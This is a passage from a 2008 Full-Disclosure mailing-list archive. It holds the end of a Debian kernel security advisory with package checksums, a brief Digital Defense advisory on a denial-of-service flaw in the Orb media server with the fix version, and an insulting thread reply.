http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.7.diff.gz Size/MD5 checksum: 3951605 2c2f19150d409bc91052c159bfc2618a http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24.orig.tar.gz Size/MD5 checksum: 59630522 6b8751d1eb8e71498ba74bbd346343af http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.7.dsc Size/MD5 checksum: 5107 5491cd0340d5f730a95e70844e786646 Architecture independent packages: http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-doc-2.6.24_2.6.24-6~etchnhalf.7_all.deb Size/MD5 checksum: 4259978 f92e913356662607598cb222d5dff90b http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-manual-2.6.24_2.6.24-6~etchnhalf.7_all.deb Size/MD5 checksum: 1547930 4b6ec3287a2a7c58f9eb7e36f6097073 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-source-2.6.24_2.6.24-6~etchnhalf.7_all.deb Size/MD5 checksum: 46861910 b7deaf2329a6dabc8ad69ba7456be5b8 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-patch-debian-2.6.24_2.6.24-6~etchnhalf.7_all.deb Size/MD5 checksum: 781324 42c163f092a7710ae7ca1a280dbb2cc3 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-support-2.6.24-etchnhalf.1_2.6.24-6~etchnhalf.7_all.deb Size/MD5 checksum: 95886 237336e36d5c66c8874fc3e90b01c906 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-tree-2.6.24_2.6.24-6~etchnhalf.7_all.deb Size/MD5 checksum: 81484 fb919006ef3884f412a18fdc000cd934 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-smp_2.6.24-6~etchnhalf.7_alpha.deb Size/MD5 checksum: 329436 9ef6006bd48b4f4433cf30c6af8470eb http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-generic_2.6.24-6~etchnhalf.7_alpha.deb Size/MD5 checksum: 330186 8e9773baa7df02ab60650197e0f54baa http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.7_alpha.deb Size/MD5 checksum: 3452298 0da67a36979ebd940641dd7f5545436f http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.7_alpha.deb Size/MD5 checksum: 81084 2928989d1ed4df77323154079b4efd36 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-generic_2.6.24-6~etchnhalf.7_alpha.deb Size/MD5 checksum: 26752936 0e09ac92c7f2f0e535b3dfc79bd2ddc7 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-alpha_2.6.24-6~etchnhalf.7_alpha.deb Size/MD5 checksum: 81108 9f7cbe9a3fe45dd71beb81a515ee392c http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-legacy_2.6.24-6~etchnhalf.7_alpha.deb Size/MD5 checksum: 330070 2d42720e8d72230600e49935be80a365 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-smp_2.6.24-6~etchnhalf.7_alpha.deb Size/MD5 checksum: 27342254 bcacd46171a9d7754c5c2b149736bc65 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-legacy_2.6.24-6~etchnhalf.7_alpha.deb Size/MD5 checksum: 26731430 650899a54478d9e03dc91daa00af6a0c amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.7_amd64.deb Size/MD5 checksum: 347556 5544acada018e12d4ef8398fe7efc1d5 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.7_amd64.deb Size/MD5 checksum: 3647784 42164154b6617c0ba436d3aed2b5c20e http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.7_amd64.deb Size/MD5 checksum: 81086 d68e490812f1556d4aa4d271d9d9e44a http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.7_amd64.deb Size/MD5 checksum: 19592822 cb92f8f4f3caea3d8d2987671385c433 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-amd64_2.6.24-6~etchnhalf.7_amd64.deb Size/MD5 checksum: 81090 de26c787b5a761f242f438353e78c899 arm architecture (ARM) http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-ixp4xx_2.6.24-6~etchnhalf.7_arm.deb Size/MD5 checksum: 308040 38431699345228ae923ebd31e0aba4e1 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-arm_2.6.24-6~etchnhalf.7_arm.deb Size/MD5 checksum: 81216 bbc58508fa9ff44db621929eb80e751c http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-footbridge_2.6.24-6~etchnhalf.7_arm.deb Size/MD5 checksum: 296358 d0fb06455bd0dd52c97c89e12d43070b http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-ixp4xx_2.6.24-6~etchnhalf.7_arm.deb Size/MD5 checksum: 10737668 6b189b959a60fc8b9b65c635eb65a5ec http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.7_arm.deb Size/MD5 checksum: 81188 c79b3b88424c70ee5722bad32e75f3f6 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-iop32x_2.6.24-6~etchnhalf.7_arm.deb Size/MD5 checksum: 305284 1c89071587b8ada061a39c944b08205a http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-footbridge_2.6.24-6~etchnhalf.7_arm.deb Size/MD5 checksum: 9355002 c5173436480e688734ce3546bd04abce http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-iop32x_2.6.24-6~etchnhalf.7_arm.deb Size/MD5 checksum: 10730318 9b9d4b4cf212a1bb30ce6466550fc131 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.7_arm.deb Size/MD5 checksum: 3935222 529d338129b03913b330882ebbae58f4 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc_2.6.24-6~etchnhalf.7_hppa.deb Size/MD5 checksum: 13329680 7b8749c32e2ac311dec45573a457a641 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc64_2.6.24-6~etchnhalf.7_hppa.deb Size/MD5 checksum: 14385376 68ce52f35c021bc8335af3eb1212d944 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc64-smp_2.6.24-6~etchnhalf.7_hppa.deb Size/MD5 checksum: 14847414 ed07ff671736068faf1a13838f7cd0fa http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc64-smp_2.6.24-6~etchnhalf.7_hppa.deb Size/MD5 checksum: 259872 0abf24914e2467e1716bd1ea7cc25815 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc-smp_2.6.24-6~etchnhalf.7_hppa.deb Size/MD5 checksum: 13845366 203f57a6337df0a6f9741c64952e1346 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc64_2.6.24-6~etchnhalf.7_hppa.deb Size/MD5 checksum: 257054 214036937097f47370694901e58246f1 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc-smp_2.6.24-6~etchnhalf.7_hppa.deb Size/MD5 checksum: 257974 8ffd5029ee339ed8612fbf75d56bea33 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.7_hppa.deb Size/MD5 checksum: 3437038 fbbb21a76ace4ed154043e0550d1f4f9 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc_2.6.24-6~etchnhalf.7_hppa.deb Size/MD5 checksum: 257230 e317c0ff6179c2c4713aa63d45175103 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-hppa_2.6.24-6~etchnhalf.7_hppa.deb Size/MD5 checksum: 81112 4610e1a67440cee6f15dc1aaf6d02548 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.7_hppa.deb Size/MD5 checksum: 81088 f7be3c9cd45f9e8937cd70094b541595 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.7_i386.deb Size/MD5 checksum: 3652904 46ea0627e98d94c761df84d74355e67a http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.7_i386.deb Size/MD5 checksum: 343836 47b0b3f7b95a15e42c1c589bf5e35674 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-686_2.6.24-6~etchnhalf.7_i386.deb Size/MD5 checksum: 19146844 8a9a904349be3aa44fc14357cd110c79 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-686-bigmem_2.6.24-6~etchnhalf.7_i386.deb Size/MD5 checksum: 355680 e663861309734521e8c5fdf8e1bbabcf http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-686_2.6.24-6~etchnhalf.7_i386.deb Size/MD5 checksum: 356332 6ce56310f3193f0f605dfe1d8abed44b http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-486_2.6.24-6~etchnhalf.7_i386.deb Size/MD5 checksum: 357066 cbbed580c43cb900703e9fd98c4588b6 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.7_i386.deb Size/MD5 checksum: 19483198 626da227a202bcbac1dbe7036d70a347 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-i386_2.6.24-6~etchnhalf.7_i386.deb Size/MD5 checksum: 81106 20d519ae3ecab8de77b4f541759776f3 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-486_2.6.24-6~etchnhalf.7_i386.deb Size/MD5 checksum: 19210828 d7e774861bf6140e6f8edb1b04c9e485 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-686-bigmem_2.6.24-6~etchnhalf.7_i386.deb Size/MD5 checksum: 19211142 9344b77b546a287d5b2a285f8b02fbdb http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.7_i386.deb Size/MD5 checksum: 81076 8d4017d9fc6b61afaaf97a4ec7d5568d ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.7_ia64.deb Size/MD5 checksum: 3565520 2f8927e7a454ded1886fa1255ac99cd8 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.7_ia64.deb Size/MD5 checksum: 81086 7003072933d4fd3fe813560d0d826227 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-mckinley_2.6.24-6~etchnhalf.7_ia64.deb Size/MD5 checksum: 32201010 c86d786acb3b64eb9c4e5e2317dda9a5 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-itanium_2.6.24-6~etchnhalf.7_ia64.deb Size/MD5 checksum: 32024038 082f739cda08dd04281e123c20781446 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-mckinley_2.6.24-6~etchnhalf.7_ia64.deb Size/MD5 checksum: 317022 26f85bedb20c4004772ce59a93fea5b6 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-itanium_2.6.24-6~etchnhalf.7_ia64.deb Size/MD5 checksum: 317394 640e3c5f4423347144678efae26a9b1a http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-ia64_2.6.24-6~etchnhalf.7_ia64.deb Size/MD5 checksum: 81098 9e49f1b1f92fb835487d4ac351427deb mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.7_mips.deb Size/MD5 checksum: 17185744 a43a8ec9dc1c76a05c53dac50b2110a6 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.7_mips.deb Size/MD5 checksum: 246732 17dbd46228199c4bfa69a2705ac1ecca http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r5k-ip32_2.6.24-6~etchnhalf.7_mips.deb Size/MD5 checksum: 227180 6a2baf832d10052ea4f1ab9cf6c18840 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.7_mips.deb Size/MD5 checksum: 246586 ae46e1c1d417c5455f5dc2dc06a94773 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.7_mips.deb Size/MD5 checksum: 309828 dd7f21c1fd27d8039aded66ffd12705f http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.7_mips.deb Size/MD5 checksum: 311170 a397b0b972cdbd14c2f0ad6a6cc54971 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.7_mips.deb Size/MD5 checksum: 81186 aa82d974436c3d47894f57cabbf81d82 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r4k-ip22_2.6.24-6~etchnhalf.7_mips.deb Size/MD5 checksum: 10543374 56bc9e7c6140c2814a78f0f184b85ef4 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.7_mips.deb Size/MD5 checksum: 3801310 1660f19b375bb13373c1c2a93cf98b75 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-mips_2.6.24-6~etchnhalf.7_mips.deb Size/MD5 checksum: 81238 8d0736ca7c7a60d2a7d225ffb497d2c5 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.7_mips.deb Size/MD5 checksum: 22244152 bcedd742286317f4d82e11bedada7cc4 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.7_mips.deb Size/MD5 checksum: 27847212 0affb18e6b357536b047e72cf7d90b4e http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r5k-ip32_2.6.24-6~etchnhalf.7_mips.deb Size/MD5 checksum: 11990248 6a871820ccd2fec8d6a0922805e239fe http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r4k-ip22_2.6.24-6~etchnhalf.7_mips.deb Size/MD5 checksum: 216186 391292b5aea99f702f43776492edd020 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.7_mips.deb Size/MD5 checksum: 17202910 1d592724023f76bd0372b4905a2d3ef4 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r5k-cobalt_2.6.24-6~etchnhalf.7_mipsel.deb Size/MD5 checksum: 13315566 0cd74f9e05cc2d31815f373a665c1116 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.7_mipsel.deb Size/MD5 checksum: 16624260 7db100dbc69b306dc8df9b1285753525 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.7_mipsel.deb Size/MD5 checksum: 308712 dd571f0d9233b3ffc9c30662c64ed838 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.7_mipsel.deb Size/MD5 checksum: 21729810 e5ed0fe010f32fec4cd175a9f4410c94 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.7_mipsel.deb Size/MD5 checksum: 16562708 29b439da109b751e351c786ec63caaaa http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-mipsel_2.6.24-6~etchnhalf.7_mipsel.deb Size/MD5 checksum: 81134 ea5da915109e06f6d7044e23e7eac408 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.7_mipsel.deb Size/MD5 checksum: 3801574 1df57842e612920edd315afa254ff886 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.7_mipsel.deb Size/MD5 checksum: 307700 fbb26ab763f0e697448aefcd52ecaec4 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.7_mipsel.deb Size/MD5 checksum: 81084 f89c0491fd4871cb5deead793f4d5af0 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.7_mipsel.deb Size/MD5 checksum: 245164 0e7680aeaee55f5efd3b5d3c345352f8 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r5k-cobalt_2.6.24-6~etchnhalf.7_mipsel.deb Size/MD5 checksum: 245472 77fc2c29508f4cf68a3d2c55e0f50819 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.7_mipsel.deb Size/MD5 checksum: 26968578 b17641f28b89fdc9ec49b14de01f41dc http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.7_mipsel.deb Size/MD5 checksum: 244908 7d56c5200a18eb5f62226ca6f25e7ed5 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-powerpc_2.6.24-6~etchnhalf.7_powerpc.deb Size/MD5 checksum: 81120 8e3de4067e283f548d1b1885459d2674 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.7_powerpc.deb Size/MD5 checksum: 3670606 b4dfc497b04645123cf938974d0cc4de http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc-miboot_2.6.24-6~etchnhalf.7_powerpc.deb Size/MD5 checksum: 293370 f779befecf93629614c042b645d9e144 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc-smp_2.6.24-6~etchnhalf.7_powerpc.deb Size/MD5 checksum: 319114 1f92bd8563b8d7b9a061c35930d19ab6 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc64_2.6.24-6~etchnhalf.7_powerpc.deb Size/MD5 checksum: 21149236 b705053a3965b14431b268e12aa52ad3 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc_2.6.24-6~etchnhalf.7_powerpc.deb Size/MD5 checksum: 320034 cbd7a9dc0ef37281fae9a491268940ba http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc_2.6.24-6~etchnhalf.7_powerpc.deb Size/MD5 checksum: 19193042 3c8ecaef8f99447708d98209f6e64846 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc-miboot_2.6.24-6~etchnhalf.7_powerpc.deb Size/MD5 checksum: 17458076 d5adf60ff2a97abdb28eecb90215226d http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc64_2.6.24-6~etchnhalf.7_powerpc.deb Size/MD5 checksum: 320636 2c6d4c306e4dca8a94c2ced7f9e19b8b http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc-smp_2.6.24-6~etchnhalf.7_powerpc.deb Size/MD5 checksum: 19482590 749b6fc27b2a1228fe727615055e16f7 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.7_powerpc.deb Size/MD5 checksum: 81090 bbb53435753b18bfbf5e79f3a6b2cdcf s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.7_s390.deb Size/MD5 checksum: 81080 b2e7e3ee09134a4119106f6b2dbd1b9a http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-s390x_2.6.24-6~etchnhalf.7_s390.deb Size/MD5 checksum: 193016 a738d97e9b92b948b604233b727b57b5 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.7_s390.deb Size/MD5 checksum: 3427926 a8052afe77d6a40855abfd5632f90ffe http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-s390_2.6.24-6~etchnhalf.7_s390.deb Size/MD5 checksum: 192808 6873cb323b4a4c482ee70e9681f690db http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390-tape_2.6.24-6~etchnhalf.7_s390.deb Size/MD5 checksum: 1499452 b52895ec51a4442e11f9b9131aabca24 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390x_2.6.24-6~etchnhalf.7_s390.deb Size/MD5 checksum: 7196080 9492b52dc99eb89c5e512ed98a02edd0 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-s390_2.6.24-6~etchnhalf.7_s390.deb Size/MD5 checksum: 81096 abc2970b4b3b4c61096e64630a382e1a http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390_2.6.24-6~etchnhalf.7_s390.deb Size/MD5 checksum: 6945738 55db5c2717615f2b6a906b7a48ba6125 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.7_sparc.deb Size/MD5 checksum: 81080 b881c0458f040d249cfadefd6f650ad9 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.7_sparc.deb Size/MD5 checksum: 3649792 e490362b2bc7f2061de496b036bacf6e http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-sparc_2.6.24-6~etchnhalf.7_sparc.deb Size/MD5 checksum: 81106 bed849cd37f07f1827b83968205006b9 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sparc64-smp_2.6.24-6~etchnhalf.7_sparc.deb Size/MD5 checksum: 259620 376c346454b210fd5a41df9333469054 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sparc64_2.6.24-6~etchnhalf.7_sparc.deb Size/MD5 checksum: 257548 e19691a226d0a32cc1c50fd8a8460483 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sparc64_2.6.24-6~etchnhalf.7_sparc.deb Size/MD5 checksum: 12978174 2639d1d96059ade27eee89b3be7d5373 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sparc64-smp_2.6.24-6~etchnhalf.7_sparc.deb Size/MD5 checksum: 13266842 1809a7df4eeedca63c0100113273119f These changes will probably be included in the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFJOBmShuANDBmkLRkRApZPAJ48yj73eeALcRxpRbKIZ1SG7ZyAFACcCpgR EYNHoAbXK1hm3n+TeEjBekc= =kYxw -----END PGP SIGNATURE----- From DDI.VulnerabilityAlert at ddifrontline.com Thu Dec 4 15:03:00 2008 From: DDI.VulnerabilityAlert at ddifrontline.com (DDI_Vulnerability_Alert) Date: Thu, 4 Dec 2008 09:03:00 -0600 Subject: [Full-disclosure] DDIVRT-2008-18 Orb Denial of Service Message-ID: <2571D31D42513640AE1632FEE100E0E402DD744F@hypercom.defense.local> Title ----- DDIVRT-2008-18 Orb Denial of Service Severity -------- Medium Date Discovered --------------- October 21st 2008 Discovered By ------------- Digital Defense, Inc. Vulnerability Research Team Credit: Steven James and r at b13$ Vulnerability Description ------------------------- Orb Networks' Orb media server is vulnerable to a denial of service condition. Sending malformed http requests may crash the service denying service to legitimate users. Solution Description -------------------- Use firewall rules to restrict access to authorized users of the Orb server. This issue has been fixed in version 2.01.0025, which is available on Orb's website. Tested Systems / Software (with versions) ------------------------------------------ Orb version 2.01.0017 on Windows XP Pro SP2 Nullsoft Winamp Remote Server Beta (featuring Orb version 2.01.0013) on Windows XP Pro SP2 Orb version 2.01.0020 on Windows XP Pro SP2 Vendor Contact -------------- Orb Networks http://www.orb.com -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081204/c63ec93e/attachment.html From nytrokiss at gmail.com Thu Dec 4 20:39:35 2008 From: nytrokiss at gmail.com (James Matthews) Date: Thu, 4 Dec 2008 22:39:35 +0200 Subject: [Full-disclosure] News for Ureleet In-Reply-To: <6f4bb0b50812031923y562135byd77eddd898caae6@mail.gmail.com> References: <4b6ee9310812030043k746d8dc2pda041c096b41196d@mail.gmail.com> <6158bb410812030652r7a8a5c8as3cc62f4ac3979df@mail.gmail.com> <4b6ee9310812031346m3129a698x561fda046588fe52@mail.gmail.com> <6f4bb0b50812031923y562135byd77eddd898caae6@mail.gmail.com> Message-ID: <8a6b8e350812041239g2e29f1b3wb632dab73ed30569@mail.gmail.com> A nice compromise i wonder if it will work...... On Thu, Dec 4, 2008 at 5:23 AM, ghost wrote: > Hey mike, how about you stop playing moderator you fucking douche bag. > I for one believe netdev brings alot to this list and encourage him > and ureleet to continue posting. > > On Wed, Dec 3, 2008 at 9:47 PM, Mike C wrote: > > Hye Guys, > > > > I though we had settled the issues offline. Lets restart our > > discussions.. this bickering is highly unnecessary on the list. > > > > -- > > MC > > Security Researcher > > Lead, Project Chroma > > http://sites.google.com/site/projectchromaproject/ > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- http://www.astorandblack.com/ http://www.jewelerslounge.com/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081204/742cf56f/attachment.html From labs-no-reply at idefense.com Thu Dec 4 19:41:13 2008 From: labs-no-reply at idefense.com (iDefense Labs) Date: Thu, 04 Dec 2008 14:41:13 -0500 Subject: 